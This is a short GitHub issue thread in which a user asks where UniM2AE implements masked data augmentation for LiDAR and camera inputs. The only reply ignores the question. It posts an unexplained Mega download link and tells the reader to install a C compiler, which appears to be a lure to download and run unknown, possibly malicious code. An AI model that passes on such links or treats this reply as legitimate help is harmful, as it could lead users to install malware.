### ISSUE TITLE
masked token production

### ISSUE THREAD

**Issue by Neko-coffee** [hollow-503/UniM2AE#7]
Hello and thank you for sharing such a great job. I'm new to this field, can you tell me what part of the code the data augmentation for the lidar and the camera corresponds to, I checked transforms_3d.py, and I didn't find any part about the lidar and the image related to the mask data augmentation.

**Comment by nhatlaso1** [comment]
maybe this will help
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)
